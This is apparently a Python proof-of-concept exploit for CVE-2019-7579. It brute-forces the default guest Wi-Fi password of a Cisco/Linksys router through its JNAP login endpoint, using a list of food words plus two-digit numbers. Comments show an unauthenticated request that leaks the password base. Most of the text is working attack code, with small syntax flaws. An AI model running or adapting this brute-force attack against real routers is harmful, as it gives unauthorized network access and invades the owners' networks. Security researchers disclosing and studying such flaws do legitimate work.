import requests import json 'Author: Aaron Weathersby (t0b0rx0r) 'email: t0b0rx0r@gmail.com 'Twitter: @t0b0rx0r 'github: https://github.com/t0b0rX0r/security 'blog: http://www.x0rsecurity.com 'CVE: CVE-2019-7579 'Intent of Program: To utilize a default password base along with a random 2 digit number to identify possible default guest wifi password. '---------------------------------------- 'Where to get password base (only works if user did not manually change password 'Note this request is unauthenicated 'GET /ui/1.0.99.187766/dynamic/js/setup.js.localized HTTP/1.1 'Host: 192.168.3.1:10080 'Accept-Encoding: gzip, deflate 'Accept: / 'Accept-Language: en 'User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 'Connection: close 'Referer: http://192.168.3.1:10080/ui/1.0.99.187766/dynamic/login-simple.html 'Cookie: is_cookies_enabled=null; visited-index=true '---------------------------------------- '---------------------------------------- 'POST request to attempt guest login 'POST /JNAP/ HTTP/1.1 'Host: 192.168.3.1:10080 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 'Accept: / 'Accept-Language: en-US,en;q=0.5 'Accept-Encoding: gzip, deflate 'Referer: http://192.168.3.1:10080/ui/dynamic/guest-login.html?mac_addr=20%3A16%3Ad8%3Af6%3A53%3A8f&url=http%3A%2F%2Fwww.cnn.com%2F&ip_addr=192.168.3.136 'Content-Type: application/json; charset=UTF-8 'X-JNAP-Action: http://cisco.com/jnap/guestnetwork/Authenticate 'Expires: Fri, 10 Oct 2013 14:19:41 GMT 'Cache-Control: no-cache 'X-Requested-With: XMLHttpRequest 'Content-Length: 80 'Cookie: visited-index=true; is_cookies_enabled=null 'Connection: close '---------------------------------------- passwordBase=[ "almond", "avocado", "basil", "banana", "blueberry", "cabbage", "carrot", "cherry", "cranberry", "cucumber", "garlic", "grape", "kiwi", "lettuce", "mango", "melon", "mushroom", "mustard", "nectarine", "olive", "onion", "pepper", "pineapple", "potato", "pumpkin", "radish", "raspberry", "strawberry", "tomato", "walnut"] listofNumbers=range(1,99) for x in passwordBase: for y in listofNumbers: payload={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0","Content-Type": "application/json; charset=UTF-8","X-JNAP-Action": "http://cisco.com/jnap/guestnetwork/Authenticate","X-Requested-With": "XMLHttpRequest","Cookie": "visited-index=true; is_cookies_enabled=null"} jSON={"macAddress":"21:16:d8:f6:53:8f",'ipAddress':'192.168.3.136','password':x+str(y)} #print(payload) url='http://192.168.3.1:10080/JNAP/' r = requests.post(url,headers=payload,data=json.dumps(jSON)) #data = r.json() #print("Reponse: ") #print(r.text) print("Trying... "+x+str(y)) if r.text.find("ErrorInvalidPassword") <> 13: print ("Found Password!") #print(r.text) print("Password is "+x+str(y)) sys.exit(1) end of POC